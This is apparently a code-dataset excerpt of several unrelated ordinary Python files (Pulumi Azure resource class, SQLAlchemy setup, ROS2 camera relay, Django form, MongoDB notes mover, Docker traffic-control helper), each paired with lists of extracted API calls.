target_profile_type: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = LinkArgs.__new__(LinkArgs)
__props__.__dict__["description"] = description
__props__.__dict__["display_name"] = display_name
if hub_name is None and not opts.urn:
raise TypeError("Missing required property 'hub_name'")
__props__.__dict__["hub_name"] = hub_name
__props__.__dict__["link_name"] = link_name
__props__.__dict__["mappings"] = mappings
__props__.__dict__["operation_type"] = operation_type
if participant_property_references is None and not opts.urn:
raise TypeError("Missing required property 'participant_property_references'")
__props__.__dict__["participant_property_references"] = participant_property_references
__props__.__dict__["reference_only"] = reference_only
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
if source_interaction_type is None and not opts.urn:
raise TypeError("Missing required property 'source_interaction_type'")
__props__.__dict__["source_interaction_type"] = source_interaction_type
if target_profile_type is None and not opts.urn:
raise TypeError("Missing required property 'target_profile_type'")
__props__.__dict__["target_profile_type"] = target_profile_type
__props__.__dict__["name"] = None
__props__.__dict__["provisioning_state"] = None
__props__.__dict__["tenant_id"] = None
__props__.__dict__["type"] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:customerinsights/v20170101:Link"), pulumi.Alias(type_="azure-native:customerinsights:Link"), pulumi.Alias(type_="azure-nextgen:customerinsights:Link"), pulumi.Alias(type_="azure-native:customerinsights/v20170426:Link"), pulumi.Alias(type_="azure-nextgen:customerinsights/v20170426:Link")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(Link, __self__).__init__(
'azure-native:customerinsights/v20170101:Link',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'Link':
"""
Get an existing Link resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = LinkArgs.__new__(LinkArgs)
__props__.__dict__["description"] = None
__props__.__dict__["display_name"] = None
__props__.__dict__["link_name"] = None
__props__.__dict__["mappings"] = None
__props__.__dict__["name"] = None
__props__.__dict__["operation_type"] = None
__props__.__dict__["participant_property_references"] = None
__props__.__dict__["provisioning_state"] = None
__props__.__dict__["reference_only"] = None
__props__.__dict__["source_interaction_type"] = None
__props__.__dict__["target_profile_type"] = None
__props__.__dict__["tenant_id"] = None
__props__.__dict__["type"] = None
return Link(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
Localized descriptions for the Link.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter(name="displayName")
def display_name(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
Localized display name for the Link.
"""
return pulumi.get(self, "display_name")
@property
@pulumi.getter(name="linkName")
def link_name(self) -> pulumi.Output[str]:
"""
The link name.
"""
return pulumi.get(self, "link_name")
@property
@pulumi.getter
def mappings(self) -> pulumi.Output[Optional[Sequence['outputs.TypePropertiesMappingResponse']]]:
"""
The set of properties mappings between the source and target Types.
"""
return pulumi.get(self, "mappings")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Resource name.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="operationType")
def operation_type(self) -> pulumi.Output[Optional[str]]:
"""
Determines whether this link is supposed to create or delete instances if Link is NOT Reference Only.
"""
return pulumi.get(self, "operation_type")
@property
@pulumi.getter(name="participantPropertyReferences")
def participant_property_references(self) -> pulumi.Output[Sequence['outputs.ParticipantPropertyReferenceResponse']]:
"""
The properties that represent the participating profile.
"""
return pulumi.get(self, "participant_property_references")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> pulumi.Output[str]:
"""
Provisioning state.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter(name="referenceOnly")
def reference_only(self) -> pulumi.Output[Optional[bool]]:
"""
Indicating whether the link is reference only link. This flag is ignored if the Mappings are defined. If the mappings are not defined and it is set to true, links processing will not create or update profiles.
"""
return pulumi.get(self, "reference_only")
@property
@pulumi.getter(name="sourceInteractionType")
def source_interaction_type(self) -> pulumi.Output[str]:
"""
Name of the source Interaction Type.
"""
return pulumi.get(self, "source_interaction_type")
@property
@pulumi.getter(name="targetProfileType")
def target_profile_type(self) -> pulumi.Output[str]:
"""
Name of the target Profile Type.
"""
return pulumi.get(self, "target_profile_type")
@property
@pulumi.getter(name="tenantId")
def tenant_id(self) -> pulumi.Output[str]:
"""
The hub name.
"""
return pulumi.get(self, "tenant_id")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
Resource type.
"""
return pulumi.get(self, "type")
| [
"pulumi.get",
"pulumi.Alias",
"pulumi.getter",
"pulumi.set",
"pulumi.ResourceOptions",
"pulumi.ResourceOptions.merge"
] | [((3810, 3839), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""hubName"""'}), "(name='hubName')\n", (3823, 3839), False, 'import pulumi\n'), ((4118, 4169), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""participantPropertyReferences"""'}), "(name='participantPropertyReferences')\n", (4131, 4169), False, 'import pulumi\n'), ((4709, 4748), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""resourceGroupName"""'}), "(name='resourceGroupName')\n", (4722, 4748), False, 'import pulumi\n'), ((5093, 5136), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""sourceInteractionType"""'}), "(name='sourceInteractionType')\n", (5106, 5136), False, 'import pulumi\n'), ((5506, 5545), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""targetProfileType"""'}), "(name='targetProfileType')\n", (5519, 5545), False, 'import pulumi\n'), ((6290, 6323), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""displayName"""'}), "(name='displayName')\n", (6303, 6323), False, 'import pulumi\n'), ((6714, 6744), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""linkName"""'}), "(name='linkName')\n", (6727, 6744), False, 'import pulumi\n'), ((7504, 7539), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""operationType"""'}), "(name='operationType')\n", (7517, 7539), False, 'import pulumi\n'), ((7989, 8024), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""referenceOnly"""'}), "(name='referenceOnly')\n", (8002, 8024), False, 'import pulumi\n'), ((17871, 17904), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""displayName"""'}), "(name='displayName')\n", (17884, 17904), False, 'import pulumi\n'), ((18116, 18146), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""linkName"""'}), "(name='linkName')\n", (18129, 18146), False, 'import pulumi\n'), ((18749, 18784), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""operationType"""'}), "(name='operationType')\n", (18762, 18784), False, 'import pulumi\n'), ((19051, 19102), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""participantPropertyReferences"""'}), "(name='participantPropertyReferences')\n", (19064, 19102), False, 'import pulumi\n'), ((19401, 19440), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""provisioningState"""'}), "(name='provisioningState')\n", (19414, 19440), False, 'import pulumi\n'), ((19623, 19658), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""referenceOnly"""'}), "(name='referenceOnly')\n", (19636, 19658), False, 'import pulumi\n'), ((20034, 20077), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""sourceInteractionType"""'}), "(name='sourceInteractionType')\n", (20047, 20077), False, 'import pulumi\n'), ((20287, 20326), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""targetProfileType"""'}), "(name='targetProfileType')\n", (20300, 20326), False, 'import pulumi\n'), ((20524, 20554), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""tenantId"""'}), "(name='tenantId')\n", (20537, 20554), False, 'import pulumi\n'), ((2835, 2877), 'pulumi.set', 'pulumi.set', (['__self__', '"""hub_name"""', 'hub_name'], {}), "(__self__, 'hub_name', hub_name)\n", (2845, 2877), False, 'import pulumi\n'), ((2886, 2978), 'pulumi.set', 'pulumi.set', (['__self__', '"""participant_property_references"""', 'participant_property_references'], {}), "(__self__, 'participant_property_references',\n participant_property_references)\n", (2896, 2978), False, 'import pulumi\n'), ((2983, 3047), 'pulumi.set', 'pulumi.set', (['__self__', '"""resource_group_name"""', 'resource_group_name'], {}), "(__self__, 'resource_group_name', resource_group_name)\n", (2993, 3047), False, 'import pulumi\n'), ((3056, 3128), 'pulumi.set', 'pulumi.set', (['__self__', '"""source_interaction_type"""', 'source_interaction_type'], {}), "(__self__, 'source_interaction_type', source_interaction_type)\n", (3066, 3128), False, 'import pulumi\n'), ((3137, 3201), 'pulumi.set', 'pulumi.set', (['__self__', '"""target_profile_type"""', 'target_profile_type'], {}), "(__self__, 'target_profile_type', target_profile_type)\n", (3147, 3201), False, 'import pulumi\n'), ((3953, 3981), 'pulumi.get', 'pulumi.get', (['self', '"""hub_name"""'], {}), "(self, 'hub_name')\n", (3963, 3981), False, 'import pulumi\n'), ((4062, 4097), 'pulumi.set', 'pulumi.set', (['self', '"""hub_name"""', 'value'], {}), "(self, 'hub_name', value)\n", (4072, 4097), False, 'import pulumi\n'), ((4397, 4448), 'pulumi.get', 'pulumi.get', (['self', '"""participant_property_references"""'], {}), "(self, 'participant_property_references')\n", (4407, 4448), False, 'import pulumi\n'), ((4630, 4688), 'pulumi.set', 'pulumi.set', (['self', '"""participant_property_references"""', 'value'], {}), "(self, 'participant_property_references', value)\n", (4640, 4688), False, 'import pulumi\n'), ((4884, 4923), 'pulumi.get', 'pulumi.get', (['self', '"""resource_group_name"""'], {}), "(self, 'resource_group_name')\n", (4894, 4923), False, 'import pulumi\n'), ((5026, 5072), 'pulumi.set', 'pulumi.set', (['self', '"""resource_group_name"""', 'value'], {}), "(self, 'resource_group_name', value)\n", (5036, 5072), False, 'import pulumi\n'), ((5281, 5324), 'pulumi.get', 'pulumi.get', (['self', '"""source_interaction_type"""'], {}), "(self, 'source_interaction_type')\n", (5291, 5324), False, 'import pulumi\n'), ((5435, 5485), 'pulumi.set', 'pulumi.set', (['self', '"""source_interaction_type"""', 'value'], {}), "(self, 'source_interaction_type', value)\n", (5445, 5485), False, 'import pulumi\n'), ((5682, 5721), 'pulumi.get', 'pulumi.get', (['self', '"""target_profile_type"""'], {}), "(self, 'target_profile_type')\n", (5692, 5721), False, 'import pulumi\n'), ((5824, 5870), 'pulumi.set', 'pulumi.set', (['self', '"""target_profile_type"""', 'value'], {}), "(self, 'target_profile_type', value)\n", (5834, 5870), False, 'import pulumi\n'), ((6075, 6106), 'pulumi.get', 'pulumi.get', (['self', '"""description"""'], {}), "(self, 'description')\n", (6085, 6106), False, 'import pulumi\n'), ((6231, 6269), 'pulumi.set', 'pulumi.set', (['self', '"""description"""', 'value'], {}), "(self, 'description', value)\n", (6241, 6269), False, 'import pulumi\n'), ((6495, 6527), 'pulumi.get', 'pulumi.get', (['self', '"""display_name"""'], {}), "(self, 'display_name')\n", (6505, 6527), False, 'import pulumi\n'), ((6654, 6693), 'pulumi.set', 'pulumi.set', (['self', '"""display_name"""', 'value'], {}), "(self, 'display_name', value)\n", (6664, 6693), False, 'import pulumi\n'), ((6870, 6899), 'pulumi.get', 'pulumi.get', (['self', '"""link_name"""'], {}), "(self, 'link_name')\n", (6880, 6899), False, 'import pulumi\n'), ((6992, 7028), 'pulumi.set', 'pulumi.set', (['self', '"""link_name"""', 'value'], {}), "(self, 'link_name', value)\n", (7002, 7028), False, 'import pulumi\n'), ((7281, 7309), 'pulumi.get', 'pulumi.get', (['self', '"""mappings"""'], {}), "(self, 'mappings')\n", (7291, 7309), False, 'import pulumi\n'), ((7448, 7483), 'pulumi.set', 'pulumi.set', (['self', '"""mappings"""', 'value'], {}), "(self, 'mappings', value)\n", (7458, 7483), False, 'import pulumi\n'), ((7770, 7804), 'pulumi.get', 'pulumi.get', (['self', '"""operation_type"""'], {}), "(self, 'operation_type')\n", (7780, 7804), False, 'import pulumi\n'), ((7927, 7968), 'pulumi.set', 'pulumi.set', (['self', '"""operation_type"""', 'value'], {}), "(self, 'operation_type', value)\n", (7937, 7968), False, 'import pulumi\n'), ((8344, 8378), 'pulumi.get', 'pulumi.get', (['self', '"""reference_only"""'], {}), "(self, 'reference_only')\n", (8354, 8378), False, 'import pulumi\n'), ((8482, 8523), 'pulumi.set', 'pulumi.set', (['self', '"""reference_only"""', 'value'], {}), "(self, 'reference_only', value)\n", (8492, 8523), False, 'import pulumi\n'), ((15994, 16040), 'pulumi.ResourceOptions.merge', 'pulumi.ResourceOptions.merge', (['opts', 'alias_opts'], {}), '(opts, alias_opts)\n', (16022, 16040), False, 'import pulumi\n'), ((17819, 17850), 'pulumi.get', 'pulumi.get', (['self', '"""description"""'], {}), "(self, 'description')\n", (17829, 17850), False, 'import pulumi\n'), ((18063, 18095), 'pulumi.get', 'pulumi.get', (['self', '"""display_name"""'], {}), "(self, 'display_name')\n", (18073, 18095), False, 'import pulumi\n'), ((18256, 18285), 'pulumi.get', 'pulumi.get', (['self', '"""link_name"""'], {}), "(self, 'link_name')\n", (18266, 18285), False, 'import pulumi\n'), ((18537, 18565), 'pulumi.get', 'pulumi.get', (['self', '"""mappings"""'], {}), "(self, 'mappings')\n", (18547, 18565), False, 'import pulumi\n'), ((18704, 18728), 'pulumi.get', 'pulumi.get', (['self', '"""name"""'], {}), "(self, 'name')\n", (18714, 18728), False, 'import pulumi\n'), ((18996, 19030), 'pulumi.get', 'pulumi.get', (['self', '"""operation_type"""'], {}), "(self, 'operation_type')\n", (19006, 19030), False, 'import pulumi\n'), ((19329, 19380), 'pulumi.get', 'pulumi.get', (['self', '"""participant_property_references"""'], {}), "(self, 'participant_property_references')\n", (19339, 19380), False, 'import pulumi\n'), ((19564, 19602), 'pulumi.get', 'pulumi.get', (['self', '"""provisioning_state"""'], {}), "(self, 'provisioning_state')\n", (19574, 19602), False, 'import pulumi\n'), ((19979, 20013), 'pulumi.get', 'pulumi.get', (['self', '"""reference_only"""'], {}), "(self, 'reference_only')\n", (19989, 20013), False, 'import pulumi\n'), ((20223, 20266), 'pulumi.get', 'pulumi.get', (['self', '"""source_interaction_type"""'], {}), "(self, 'source_interaction_type')\n", (20233, 20266), False, 'import pulumi\n'), ((20464, 20503), 'pulumi.get', 'pulumi.get', (['self', '"""target_profile_type"""'], {}), "(self, 'target_profile_type')\n", (20474, 20503), False, 'import pulumi\n'), ((20663, 20692), 'pulumi.get', 'pulumi.get', (['self', '"""tenant_id"""'], {}), "(self, 'tenant_id')\n", (20673, 20692), False, 'import pulumi\n'), ((20831, 20855), 'pulumi.get', 'pulumi.get', (['self', '"""type"""'], {}), "(self, 'type')\n", (20841, 20855), False, 'import pulumi\n'), ((3250, 3298), 'pulumi.set', 'pulumi.set', (['__self__', '"""description"""', 'description'], {}), "(__self__, 'description', description)\n", (3260, 3298), False, 'import pulumi\n'), ((3348, 3398), 'pulumi.set', 'pulumi.set', (['__self__', '"""display_name"""', 'display_name'], {}), "(__self__, 'display_name', display_name)\n", (3358, 3398), False, 'import pulumi\n'), ((3445, 3489), 'pulumi.set', 'pulumi.set', (['__self__', '"""link_name"""', 'link_name'], {}), "(__self__, 'link_name', link_name)\n", (3455, 3489), False, 'import pulumi\n'), ((3535, 3577), 'pulumi.set', 'pulumi.set', (['__self__', '"""mappings"""', 'mappings'], {}), "(__self__, 'mappings', mappings)\n", (3545, 3577), False, 'import pulumi\n'), ((3629, 3683), 'pulumi.set', 'pulumi.set', (['__self__', '"""operation_type"""', 'operation_type'], {}), "(__self__, 'operation_type', operation_type)\n", (3639, 3683), False, 'import pulumi\n'), ((3735, 3789), 'pulumi.set', 'pulumi.set', (['__self__', '"""reference_only"""', 'reference_only'], {}), "(__self__, 'reference_only', reference_only)\n", (3745, 3789), False, 'import pulumi\n'), ((13405, 13429), 'pulumi.ResourceOptions', 'pulumi.ResourceOptions', ([], {}), '()\n', (13427, 13429), False, 'import pulumi\n'), ((16811, 16840), 'pulumi.ResourceOptions', 'pulumi.ResourceOptions', ([], {'id': 'id'}), '(id=id)\n', (16833, 16840), False, 'import pulumi\n'), ((15655, 15722), 'pulumi.Alias', 'pulumi.Alias', ([], {'type_': '"""azure-nextgen:customerinsights/v20170101:Link"""'}), "(type_='azure-nextgen:customerinsights/v20170101:Link')\n", (15667, 15722), False, 'import pulumi\n'), ((15724, 15780), 'pulumi.Alias', 'pulumi.Alias', ([], {'type_': '"""azure-native:customerinsights:Link"""'}), "(type_='azure-native:customerinsights:Link')\n", (15736, 15780), False, 'import pulumi\n'), ((15782, 15839), 'pulumi.Alias', 'pulumi.Alias', ([], {'type_': '"""azure-nextgen:customerinsights:Link"""'}), "(type_='azure-nextgen:customerinsights:Link')\n", (15794, 15839), False, 'import pulumi\n'), ((15841, 15907), 'pulumi.Alias', 'pulumi.Alias', ([], {'type_': '"""azure-native:customerinsights/v20170426:Link"""'}), "(type_='azure-native:customerinsights/v20170426:Link')\n", (15853, 15907), False, 'import pulumi\n'), ((15909, 15976), 'pulumi.Alias', 'pulumi.Alias', ([], {'type_': '"""azure-nextgen:customerinsights/v20170426:Link"""'}), "(type_='azure-nextgen:customerinsights/v20170426:Link')\n", (15921, 15976), False, 'import pulumi\n')] |
"""
Database connection and sessions
"""
from sqlalchemy.engine.url import URL
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from sqlalchemy.interfaces import PoolListener
from igcweight import settings
__engine_url = {'drivername': settings.DB_ENGINE, 'query': settings.DB_ARGS}
if settings.DB_USERNAME != '':
__engine_url['username'] = settings.DB_USERNAME
if settings.DB_PASSWORD != '':
__engine_url['password'] = settings.DB_PASSWORD
if settings.DB_HOST != '':
__engine_url['host'] = settings.DB_HOST
if settings.DB_PORT != '':
__engine_url['port'] = settings.DB_PORT
if settings.DB_DATABASE != '':
__engine_url['database'] = settings.DB_DATABASE
class ForeignKeysListener(PoolListener):
def connect(self, dbapi_con, con_record):
dbapi_con.execute('pragma foreign_keys=ON')
engine = create_engine(
URL(**__engine_url),
echo=settings.DEBUG,
convert_unicode=True,
listeners=[ForeignKeysListener()]
)
Session = sessionmaker(bind=engine, autoflush=True)
session = Session()
| [
"sqlalchemy.orm.sessionmaker",
"sqlalchemy.engine.url.URL"
] | [((1000, 1041), 'sqlalchemy.orm.sessionmaker', 'sessionmaker', ([], {'bind': 'engine', 'autoflush': '(True)'}), '(bind=engine, autoflush=True)\n', (1012, 1041), False, 'from sqlalchemy.orm import sessionmaker\n'), ((877, 896), 'sqlalchemy.engine.url.URL', 'URL', ([], {}), '(**__engine_url)\n', (880, 896), False, 'from sqlalchemy.engine.url import URL\n')] |
#!/usr/bin/env python3
import os
import sys
import copy
import re
import importlib
import numpy as np
import rclpy
from rclpy.qos import qos_profile_sensor_data
from rclpy.node import Node
from rclpy.exceptions import ParameterNotDeclaredException
from rcl_interfaces.msg import Parameter
from rcl_interfaces.msg import ParameterType
from rcl_interfaces.msg import ParameterDescriptor
import sensor_msgs.msg
from cv_bridge import CvBridge
from rclpy.qos import QoSProfile
import cv2
if cv2.__version__ < "4.0.0":
raise ImportError("Requires opencv >= 4.0, "
"but found {:s}".format(cv2.__version__))
class RQTCameraGazebo(Node):
def __init__(self):
super().__init__("rqt_camera_gazebo")
# Get paramaters or defaults
camera_image_subscription_topic_descriptor = ParameterDescriptor(
type=ParameterType.PARAMETER_STRING,
description='Camera image subscription topic.')
camera_image_publish_topic_descriptor = ParameterDescriptor(
type=ParameterType.PARAMETER_STRING,
description='Camera image publish topic.')
camera_image_format_descriptor = ParameterDescriptor(
type=ParameterType.PARAMETER_STRING,
description='Camera image format.')
self.declare_parameter("camera_sub", "rgb_cam",
camera_image_subscription_topic_descriptor)
self.declare_parameter("camera_pub", "rqt_rgb_cam",
camera_image_publish_topic_descriptor)
self.declare_parameter("camera_format", "bgr8",
camera_image_publish_topic_descriptor)
self.cameraImageSubTopic = self.get_parameter("camera_sub").value
self.cameraImagePubTopic = self.get_parameter("camera_pub").value
self.cameraImageFormat = self.get_parameter("camera_format").value
#setup CvBridge
self.bridge = CvBridge()
#Subscribers
self.imageSub = self.create_subscription(sensor_msgs.msg.Image,
'/{:s}'.format(self.cameraImageSubTopic),
self.imageCallback,
qos_profile_sensor_data)
#Publishers
self.imagePub = self.create_publisher(sensor_msgs.msg.Image,
'/{:s}'.format(self.cameraImagePubTopic), 0)
def imageCallback(self, data):
# Scene from subscription callback
scene = self.bridge.imgmsg_to_cv2(data, self.cameraImageFormat)
msg = self.bridge.cv2_to_imgmsg(scene, self.cameraImageFormat)
msg.header.stamp = data.header.stamp
self.imagePub.publish(msg)
def main(args=None):
rclpy.init(args=args)
node = RQTCameraGazebo()
rclpy.spin(node)
rclpy.shutdown()
if __name__ == '__main__':
main()
| [
"rcl_interfaces.msg.ParameterDescriptor",
"rclpy.spin",
"cv_bridge.CvBridge",
"rclpy.init",
"rclpy.shutdown"
] | [((2647, 2668), 'rclpy.init', 'rclpy.init', ([], {'args': 'args'}), '(args=args)\n', (2657, 2668), False, 'import rclpy\n'), ((2702, 2718), 'rclpy.spin', 'rclpy.spin', (['node'], {}), '(node)\n', (2712, 2718), False, 'import rclpy\n'), ((2723, 2739), 'rclpy.shutdown', 'rclpy.shutdown', ([], {}), '()\n', (2737, 2739), False, 'import rclpy\n'), ((819, 928), 'rcl_interfaces.msg.ParameterDescriptor', 'ParameterDescriptor', ([], {'type': 'ParameterType.PARAMETER_STRING', 'description': '"""Camera image subscription topic."""'}), "(type=ParameterType.PARAMETER_STRING, description=\n 'Camera image subscription topic.')\n", (838, 928), False, 'from rcl_interfaces.msg import ParameterDescriptor\n'), ((1006, 1110), 'rcl_interfaces.msg.ParameterDescriptor', 'ParameterDescriptor', ([], {'type': 'ParameterType.PARAMETER_STRING', 'description': '"""Camera image publish topic."""'}), "(type=ParameterType.PARAMETER_STRING, description=\n 'Camera image publish topic.')\n", (1025, 1110), False, 'from rcl_interfaces.msg import ParameterDescriptor\n'), ((1173, 1270), 'rcl_interfaces.msg.ParameterDescriptor', 'ParameterDescriptor', ([], {'type': 'ParameterType.PARAMETER_STRING', 'description': '"""Camera image format."""'}), "(type=ParameterType.PARAMETER_STRING, description=\n 'Camera image format.')\n", (1192, 1270), False, 'from rcl_interfaces.msg import ParameterDescriptor\n'), ((1918, 1928), 'cv_bridge.CvBridge', 'CvBridge', ([], {}), '()\n', (1926, 1928), False, 'from cv_bridge import CvBridge\n')] |
import binaryCode as bc
import pyperclip
import time
a = input("encode, decode, or make a key[e/d/m]?\n")
if a == "e":
bc.encode(input("what text?\n"), input("what key?\n"))
print("file saved as photo.jpeg.\nRename for extra security.")
elif a == "d":
print(bc.decode(input("what key?\n"), input("filename?\n")))
print("that's the code.")
elif a == "m":
pyperclip.copy(bc.generateKey(False))
print("key copied to clipboard.")
else:
print("??? i dont get it")
time.sleep(5) | [
"time.sleep",
"binaryCode.generateKey"
] | [((487, 500), 'time.sleep', 'time.sleep', (['(5)'], {}), '(5)\n', (497, 500), False, 'import time\n'), ((389, 410), 'binaryCode.generateKey', 'bc.generateKey', (['(False)'], {}), '(False)\n', (403, 410), True, 'import binaryCode as bc\n')] |
# -*- coding: utf-8 -*-
'''
Created on Mar 20, 2011
@author: <NAME>
@copyright: Copyright © 2011
other contributers:
'''
from django import forms
from django.utils.translation import ugettext, ugettext_lazy as _
from calendars.models.cals import Occurrence
class OccurrenceForm(forms.ModelForm):
start = forms.DateTimeField()
end = forms.DateTimeField()
class Meta:
model = Occurrence
exclude = ('original_start', 'original_end', 'event', 'cancelled')
def clean_end(self):
if self.cleaned_data['end'] <= self.cleaned_data['start']:
raise forms.ValidationError(_("The end time must be later than start time."))
return self.cleaned_data['end']
| [
"django.utils.translation.ugettext_lazy",
"django.forms.DateTimeField"
] | [((313, 334), 'django.forms.DateTimeField', 'forms.DateTimeField', ([], {}), '()\n', (332, 334), False, 'from django import forms\n'), ((345, 366), 'django.forms.DateTimeField', 'forms.DateTimeField', ([], {}), '()\n', (364, 366), False, 'from django import forms\n'), ((631, 679), 'django.utils.translation.ugettext_lazy', '_', (['"""The end time must be later than start time."""'], {}), "('The end time must be later than start time.')\n", (632, 679), True, 'from django.utils.translation import ugettext, ugettext_lazy as _\n')] |
#!/usr/bin/env python
import argparse
import logging
import pymongo
from logger import setup_logger
def database(connection_string, db_name):
"""Connect to mongodb."""
client = pymongo.MongoClient(connection_string)
return client[db_name]
def move_notes(db, collection, source_id, source, dest, dry_run):
"""Move the values in the 'source' key to the 'dest' key for cases in the 'collection'
collection in the 'db' where their caseReference.sourceId matches 'source_id'.
If 'dry_run' is set, then don't actually change anything, but do report on which cases
would be modified."""
logging.info(f"Moving values from {source} to {dest} in collection: {collection}")
query = { "caseReference.sourceId": source_id }
if dry_run:
logging.info("Dry running notes movement")
cases = db[collection].find(query)
logging.info(f"Would move {source} to {dest} on:")
for case in cases:
logging.info(f"Case: {case}")
return
operations = [
pymongo.UpdateMany(query, { "$rename": { source: dest } })
]
outcome = db[collection].bulk_write(operations)
logging.info(f"Outcome: {outcome.bulk_api_result}")
def main():
parser = argparse.ArgumentParser(
description='Move case notes between the regular and restricted notes fields.')
parser.add_argument('--connection_string', type=str, required=True, help='mongodb connection string')
parser.add_argument('--source_id', type=str, required=True, help='Source identifier for cases to update')
parser.add_argument('--database_name', type=str, default='covid19', help='Name of the database with cases to update')
parser.add_argument('--collection_name', type=str, default='cases', help='Collection with cases to update')
parser.add_argument('--derestrict', action="store_true", help='Move restricted notes to notes (default is move notes to restricted notes)')
parser.add_argument('--dry_run', action="store_true", help="Don't actually make any changes, just report on what would have changed")
args = parser.parse_args()
db = database(args.connection_string, args.database_name)
[source, destination] = ["restrictedNotes", "notes"] if args.derestrict else ["notes", "restrictedNotes"]
move_notes(db, args.collection_name, args.source_id, source, destination, args.dry_run)
if __name__ == '__main__':
setup_logger()
main()
| [
"argparse.ArgumentParser",
"logger.setup_logger",
"pymongo.UpdateMany",
"pymongo.MongoClient",
"logging.info"
] | [((189, 227), 'pymongo.MongoClient', 'pymongo.MongoClient', (['connection_string'], {}), '(connection_string)\n', (208, 227), False, 'import pymongo\n'), ((618, 705), 'logging.info', 'logging.info', (['f"""Moving values from {source} to {dest} in collection: {collection}"""'], {}), "(\n f'Moving values from {source} to {dest} in collection: {collection}')\n", (630, 705), False, 'import logging\n'), ((1154, 1205), 'logging.info', 'logging.info', (['f"""Outcome: {outcome.bulk_api_result}"""'], {}), "(f'Outcome: {outcome.bulk_api_result}')\n", (1166, 1205), False, 'import logging\n'), ((1233, 1341), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Move case notes between the regular and restricted notes fields."""'}), "(description=\n 'Move case notes between the regular and restricted notes fields.')\n", (1256, 1341), False, 'import argparse\n'), ((2410, 2424), 'logger.setup_logger', 'setup_logger', ([], {}), '()\n', (2422, 2424), False, 'from logger import setup_logger\n'), ((777, 819), 'logging.info', 'logging.info', (['"""Dry running notes movement"""'], {}), "('Dry running notes movement')\n", (789, 819), False, 'import logging\n'), ((871, 921), 'logging.info', 'logging.info', (['f"""Would move {source} to {dest} on:"""'], {}), "(f'Would move {source} to {dest} on:')\n", (883, 921), False, 'import logging\n'), ((1033, 1087), 'pymongo.UpdateMany', 'pymongo.UpdateMany', (['query', "{'$rename': {source: dest}}"], {}), "(query, {'$rename': {source: dest}})\n", (1051, 1087), False, 'import pymongo\n'), ((961, 990), 'logging.info', 'logging.info', (['f"""Case: {case}"""'], {}), "(f'Case: {case}')\n", (973, 990), False, 'import logging\n')] |
import contextlib
import logging
import socket
import sys
import docker
import yaml
import ip_utils
client = docker.from_env()
logging.basicConfig(level=logging.INFO)
log = logging.getLogger('netz')
def compose_name():
""" HACK (?) getting the compose project this container belongs to. """
me = socket.gethostname()
for c in client.containers.list():
if c.id.startswith(me):
return c.labels.get('com.docker.compose.project')
raise RuntimeError(
'Netz container could not find itself on the Docker API.')
def project_containers(project):
""" Get all containers that belong to a Compose project. """
return tuple(c for c in client.containers.list() if
c.labels.get('com.docker.compose.project', None) == project)
def project_networks(project):
""" Get all networks that belong to a Compose project. """
return tuple(
n for n in client.networks.list() if
n.attrs['Labels'].get('com.docker.compose.project', None) == project)
def interface_in_net(c, n):
""" Get interface at which container c is attached to network n. """
# Container IP address in network.
ip = n.attrs['Containers'][c.id]['IPv4Address']
# Build ip->interface dict and get the interface we're looking for.
ip_to_name = ip_utils.ipv4_to_name(raising_exec(c, 'ip address').decode())
return ip_to_name[ip]
def raising_exec(c, cmd):
""" Run command cmd on container c; raise on return code != 0. """
# As long as https://github.com/docker/docker-py/issues/1381 is open, plug
# code from https://github.com/docker/docker-py/pull/1495.
log.debug('Running command {}'.format(cmd))
resp = c.client.api.exec_create(
c.id, cmd, stdout=True, stderr=True, stdin=False, tty=False,
privileged=False, user='')
exec_output = c.client.api.exec_start(
resp['Id'], detach=False, tty=False, stream=False, socket=False)
exec_inspect = c.client.api.exec_inspect(resp['Id'])
if exec_inspect['ExitCode'] == 0:
return exec_output
else:
raise RuntimeError(exec_output)
def tc_commands(dev, config):
htb = config.get('htb', '')
netem = config.get('netem', '')
# https://github.com/moby/moby/issues/33162#issuecomment-306424194
yield 'ip link set {} qlen 1000'.format(dev)
